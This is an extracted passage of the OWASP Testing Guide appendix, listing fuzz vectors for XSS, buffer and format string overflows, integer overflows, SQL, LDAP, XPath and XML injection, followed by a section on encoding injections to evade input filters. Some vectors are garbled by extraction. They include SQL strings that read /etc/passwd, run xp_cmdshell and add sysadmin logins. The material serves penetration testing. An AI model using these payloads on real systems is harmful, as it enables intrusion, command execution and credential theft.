1BO4r2U

Recommendations

Info

217 218 Cross Site Scripting (XSS) For details on XSS: Cross-site Scripting (XSS) >”>alert(“XSS”)& “>@import”javascript:alert(‘XSS’)”; >”’> >%22%27> ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’ “> >” ‘’;!--”=&{()} Buffer Overflows and Format String Errors Buffer Overflows (BFO) A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory. For details on Buffer Overflows: Testing for Buffer Overflow Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash. A x 5 A x 17 A x 33 A x 65 A x 129 A x 257 A x 513 A x 1024 A x 2049 A x 4097 A x 8193 A x 12288 Format String Errors (FSE) Format string attacks are a class of vulnerabilities that involve supplying language specific format tokens to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input. An excellent introduction on FSE can be found in the USENIX paper entitled: Detecting Format String Vulnerabilities with Type Qualifiers Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash. %s%p%x%d .1024d %.2049d %p%p%p%p %x%x%x%x %d%d%d%d %s%s%s%s %99999999999s %08x %%20d %%20n %%20x %%20s %s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%- j%z%Z%t%i%e%g%f%a%C%S%08x%% %s x 129 Integer Overflows (INT) Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type’s maximum value or less than its minimum value. If a tester can cause the program to perform such a memory allocation, the program can be potentially vulnerable to a buffer overflow attack. -1 0 0x100 0x1000 0x3fffffff 0x7ffffffe 0x7fffffff 0x80000000 0xfffffffe 0xffffffff 0x10000 0x100000 SQL Injection This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements. For details on Testing SQL Injection: Testing for SQL Injection SQL Injection is classified in the following two categories, depending on the exposure of database information (passive) or the alteration of database information (active). • Passive SQL Injection • Active SQL Injection Active SQL Injection statements can have a detrimental effect on the underlying database if successfully executed. Passive SQL Injection (SQP) ‘||(elt(-3+5,bin(15),ord(10),hex(char(45)))) ||6 ‘||’6 (||6) ‘ OR 1=1-- OR 1=1 ‘ OR ‘1’=’1 ; OR ‘1’=’1’ %22+or+isnull%281%2F0%29+%2F* %27+OR+%277659%27%3D%277659 %22+or+isnull%281%2F0%29+%2F* %27+--+ ‘ or 1=1-- “ or 1=1-- ‘ or 1=1 /* or 1=1-- ‘ or ‘a’=’a “ or “a”=”a ‘) or (‘a’=’a Admin’ OR ‘ ‘%20SELECT%20*%20FROM%20INFORMATION_SCHEMA. TABLES-- ) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA. TABLES; ‘ having 1=1-- ‘ having 1=1-- ‘ group by userid having 1=1-- ‘ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename’)-- ‘ or 1 in (select @@version)-- ‘ union all select @@version-- ‘ OR ‘unusual’ = ‘unusual’ ‘ OR ‘something’ = ‘some’+’thing’ ‘ OR ‘text’ = N’text’ ‘ OR ‘something’ like ‘some%’ ‘ OR 2 > 1 ‘ OR ‘text’ > ‘t’ ‘ OR ‘whatever’ in (‘whatever’) ‘ OR 2 BETWEEN 1 and 3 ‘ or username like char(37); ‘ union select * from users where login = char(114,111,111,116); ‘ union select Password:*/=1-- UNI/**/ON SEL/**/ECT ‘; EXECUTE IMMEDIATE ‘SEL’ || ‘ECT US’ || ‘ER’ ‘; EXEC (‘SEL’ + ‘ECT US’ + ‘ER’) ‘/**/OR/**/1/**/=/**/1 ‘ or 1/* +or+isnull%281%2F0%29+%2F* %27+OR+%277659%27%3D%277659 %22+or+isnull%281%2F0%29+%2F* %27+--+&password= ‘; begin declare @var varchar(8000) set @var=’:’ select @ var=@var+’+login+’/’+password+’ ‘ from users where login > @var select @var as var into temp end -- ‘ and 1 in (select var from temp)-- ‘ union select 1,load_file(‘/etc/passwd’),1,1,1; 1;(load_file(ch ar(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; ‘ and 1=( if((load_file(char(110,46,101,120,116))ch ar(39,39)),1,0)); Active SQL Injection (SQI) ‘; exec master..xp_cmdshell ‘ping 10.10.1.2’-- CREATE USER name IDENTIFIED BY ‘pass123’ CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; ‘ ; drop table temp -- exec sp_addlogin ‘name’ , ‘password’ exec sp_addsrvrolemember ‘name’ , ‘sysadmin’ INSERT INTO mysql.user (user, host, password) VALUES (‘name’, ‘localhost’, PASSWORD(‘pass123’)) GRANT CONNECT TO name; GRANT RESOURCE TO name; INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x- 72),char(0x64)
219 220 LDAP Injection For details on LDAP Injection: Testing for LDAP Injection | ! ( ) %28 %29 & %26 %21 %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 *()|%26’ admin* admin*)((|userPassword=*) *)(uid=*))(|(uid=* XPATH Injection For details on XPATH Injection: Testing for XPath Injection ‘+or+’1’=’1 ‘+or+’’=’ x’+or+1=1+or+’x’=’y / / / * */* @* count(/child::node()) x’+or+name()=’username’+or+’x’=’y XML Injection Details on XML Injection here: Testing for XML Injection var n=0;while(true){n++;}]]> SCRIPT]]>alert(‘gotcha’);/ SCRIPT]]> ]>&xee; ]>&xee; ]>&xee; ]>&xee; OWASP Testing Guide Appendix D: Encoded Injection Background Character encoding is the process of mapping characters, numbers and other symbols to a standard format. Typically, this is done to create a message ready for transmission between sender and receiver. It is, in simple terms, the conversion of characters (belonging to different languages like English, Chinese, Greek or any other known language) into bytes. An example of a widely used character encoding scheme is the American Standard Code for Information Interchange (ASCII) that initially used 7-bit codes. More recent examples of encoding schemes would be the Unicode UTF-8 and UTF-16 computing industry standards. In the space of application security and due to the plethora of encoding schemes available, character encoding has a popular misuse. It is being used for encoding malicious injection strings in a way that obfuscates them. This can lead to the bypass of input validation filters, or take advantage of particular ways in which browsers render encoded text. Input Encoding – Filter Evasion Web applications usually employ different types of input filtering mechanisms to limit the input that can be submitted by the user. If these input filters are not implemented sufficiently well, it is possible to slip a character or two through these filters. For instance, a / can be represented as 2F (hex) in ASCII, while the same character (/) is encoded as C0 AF in Unicode (2 byte sequence). Therefore, it is important for the input filtering control to be aware of the encoding scheme used. If the filter is found to be detecting only UTF-8 encoded injections, a different encoding scheme may be employed to bypass this filter. Output Encoding – Server & Browser Consensus Web browsers need to be aware of the encoding scheme used to coherently display a web page. Ideally, this information should be provided to the browser in the HTTP header (“Content-Type”) field, as Content-Type: text/html; charset=UTF-8 shown below: or through HTML META tag (“META HTTP-EQUIV”), as shown below: It is through these character encoding declarations that the browser understands which set of characters to use when converting bytes to characters. Note that the content type mentioned in the HTTP header has precedence over the META tag declaration. CERT describes it here as follows: Many web pages leave the character encoding (“charset” parameter in HTTP) undefined. In earlier versions of HTML and HTTP, the character encoding was supposed to default to ISO-8859-1 if it wasn’t defined. In fact, many browsers had a different default, so it was not possible to rely on the default being ISO-8859-1. HTML version 4 legitimizes this - if the character encoding isn’t specified, any character encoding can be used. If the web server doesn’t specify which character encoding is in use, it can’t tell which characters are special. Web pages with unspecified character encoding work most of the time because most character sets assign the same characters to byte values below 128. But which of the values above 128 are special? Some 16-bit character-encoding schemes have additional multi-byte representations for special characters such as “’ works as a closing bracket for a HTML tag. In order to actually display this character on the web page HTML character entities should be inserted in the page source. The injections mentioned above are one way of encoding. There are numerous other ways in which a string can be encoded (obfuscated) in order to bypass the above filter. Hex Encoding Hex, short for Hexadecimal, is a base 16 numbering system i.e it has 16 different values from 0 to 9 and A to F to represent various characters. Hex encoding is another form of obfuscation that is sometimes used to bypass input validation filters. For instance, hex encoded version of the string is A variation of the above string is given below. Can be used in case ‘%’ is being filtered: There are other encoding schemes, such as Base64 and Octal, that may be used for obfuscation. Although, every encoding scheme may not work every time, a bit of trial and error coupled with intelligent manipulations would definitely reveal the loophole in a weakly built input validation filter. UTF-7 Encoding UTF-7 encoding of alert(‘XSS’); is as below +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- For the above script to work, the browser has to interpret the web page as encoded in UTF-7. Multi-byte Encoding Variable-width encoding is another type of character encoding scheme that uses codes of varying lengths to encode characters. Multi-Byte Encoding is a type of variable-width encoding that uses varying number of bytes to represent a character. Multi-byte encoding is primarily used to encode characters that belong to a large character set e.g. Chinese, Japanese and Korean. Multibyte encoding has been used in the past to bypass standard input validation functions and carry out cross site scripting and SQL injection attacks. References • http: /en.wikipedia.org/wiki/Encode_(semiotics) • http: /ha.ckers.org/xss.html • http: /www.cert.org/tech_tips/malicious_code_mitigation.html • http: /www.w3schools.com/HTML/html_entities.asp • http: /www.iss.net/security_center/advice/Intrusions/2000639/default.htm • http: /searchsecurity.techtarget.com/expert/Knowledgebase- Answer/0,289625,sid14_gci1212217_tax299989,00.html • http: /www.joelonsoftware.com/articles/Unicode.html
Page 1 and 2:
1 2 THE ICONS BELOW REPRESENT WHAT
Page 3 and 4:
3 4 Testing Guide Frontispiece Test
Page 5 and 6:
7 8 Testing Guide Introduction Test
Page 7 and 8:
11 12 Testing Guide Introduction Te
Page 9 and 10:
15 16 Testing Guide Introduction Te
Page 11 and 12:
19 20 Testing Guide Introduction of
Page 13 and 14:
23 24 Web Application Penetration T
Page 15 and 16:
Page 17 and 18:
Page 19 and 20:
Page 21 and 22:
Page 23 and 24:
Page 25 and 26:
Page 27 and 28:
Page 29 and 30:
Page 31 and 32:
Page 33 and 34:
Page 35 and 36:
Page 37 and 38:
Page 39 and 40:
Page 41 and 42:
Page 43 and 44:
Page 45 and 46:
Page 47 and 48:
Page 49 and 50:
Page 51 and 52:
99 100 Web Application Penetration
Page 53 and 54:
Page 55 and 56:
Page 57 and 58:
Page 59 and 60: 115 116 Web Application Penetration
Page 107 and 108: 211 212 Reporting Appendix Test ID
Page 109: 215 216 Appendix Appendix Testing -
show all

1BO4r2U

Create successful ePaper yourself

Delete template?

Save as template?